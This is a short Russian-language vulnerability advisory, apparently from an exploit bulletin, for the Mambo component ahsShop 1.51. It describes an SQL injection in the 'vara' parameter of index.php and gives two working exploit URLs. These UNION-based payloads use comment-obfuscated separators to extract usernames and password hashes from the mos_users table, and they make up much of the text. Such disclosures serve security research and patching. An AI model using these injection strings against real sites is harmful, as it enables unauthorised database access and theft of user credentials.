Программа: Mambo Component ahsShop 1.51
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «vara» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
index.php?option=com_ahsshop&do=default&vara=-99999/**/union/* */select/**/0,concat(username,0x3a,password),0x3a,3,4,0x3a,6,0x3a/**/from/**/mos_users/*
index.php?option=com_ahsshop&do=default&vara=-99999/**/union/* */select/**/concat(username,0x3a,password),1/* */from/**/mos_users/*